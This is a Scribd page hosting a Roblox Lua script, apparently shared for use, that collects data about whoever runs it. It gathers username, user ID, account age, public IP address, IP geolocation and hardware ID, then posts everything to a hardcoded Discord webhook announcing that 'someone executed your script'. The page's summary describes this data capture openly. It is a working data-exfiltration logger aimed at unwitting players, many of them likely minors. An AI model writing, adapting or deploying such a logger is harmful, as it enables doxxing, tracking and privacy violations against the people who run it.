0% found this document useful (0 votes)
21 views2 pages

Sigma

The script captures player information from Roblox, including their display name, user ID, account age, and location, and sends this data to a specified Discord webhook. It also detects the executor used to run the script and includes game-related information. A warning is provided that the script has not been verified by ScriptBlox and should be used at one's own risk.

Uploaded by

cactusreel123324
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
21 views2 pages

Sigma

The script captures player information from Roblox, including their display name, user ID, account age, and location, and sends this data to a specified Discord webhook. It also detects the executor used to run the script and includes game-related information. A warning is provided that the script has not been verified by ScriptBlox and should be used at one's own risk.

Uploaded by

cactusreel123324
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

--[[

WARNING: Heads up! This script has not been verified by ScriptBlox. Use at
your own risk!
]]
local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local MarketplaceService = game:GetService("MarketplaceService")

local LocalPlayer = Players.LocalPlayer


local Userid = LocalPlayer.UserId
local DName = LocalPlayer.DisplayName
local Name = LocalPlayer.Name
local MembershipType = tostring(LocalPlayer.MembershipType):sub(21)
local AccountAge = LocalPlayer.AccountAge
local Country = game.LocalizationService.RobloxLocaleId
local GetIp = game:HttpGet("https://v4.ident.me/")
local GetData = game:HttpGet("http://ip-api.com/json")
local GetHwid = game:GetService("RbxAnalyticsService"):GetClientId()
local ConsoleJobId = 'Roblox.GameLauncher.joinGameInstance(' .. game.PlaceId .. ',
"' .. game.JobId .. '")'

local GAMENAME = MarketplaceService:GetProductInfo(game.PlaceId).Name

local function detectExecutor()


return identifyexecutor()
end

print(detectExecutor())

local function createWebhookData()


local webhookcheck = detectExecutor()

local data = {
["avatar_url"] = "",
["content"] = "",
["embeds"] = {
{
["author"] = {
["name"] = "Someone executed your script",
["url"] = "https://roblox.com",
},
["description"] = string.format(
"__[Player Info](https://www.roblox.com/users/%d)__" ..
" **\nDisplay Name:** %s \n**Username:** %s \n**User Id:** %d\
n**MembershipType:** %s" ..
"\n**AccountAge:** %d\n**Country:** %s**\nIP:** %s**\nHwid:**
%s**\nDate:** %s**\nTime:** %s" ..
"\n\n__[Game Info](https://www.roblox.com/games/%d)__" ..
"\n**Game:** %s \n**Game Id**: %d \n**Exploit:** %s" ..
"\n\n**Data:**```%s```\n\n**JobId:**```%s```",
Userid, DName, Name, Userid, MembershipType, AccountAge,
Country, GetIp, GetHwid,
tostring(os.date("%m/%d/%Y")), tostring(os.date("%X")),
game.PlaceId, GAMENAME, game.PlaceId, webhookcheck,
GetData, ConsoleJobId
),
["type"] = "rich",
["color"] = tonumber("0xFFD700"),
["thumbnail"] = {
["url"] = "https://www.roblox.com/headshot-thumbnail/image?
userId="..Userid.."&width=150&height=150&format=png"
},
}
}
}
return HttpService:JSONEncode(data)
end

local function sendWebhook(webhookUrl, data)


local headers = {
["content-type"] = "application/json"
}

local request = http_request or request or HttpPost or syn.request


local abcdef = {Url = webhookUrl, Body = data, Method = "POST", Headers =
headers}
request(abcdef)
end

local webhookUrl = "https://ptb.discord.com/api/webhooks/1219006432167333938/ZuLZ-


rUlhoX3fC2Ae58YMupoQgXo3BH29r9pSMppIV_pCjw8PzyTVrId7UityofXdR7H"
local webhookData = createWebhookData()

sendWebhook(webhookUrl, webhookData)

You might also like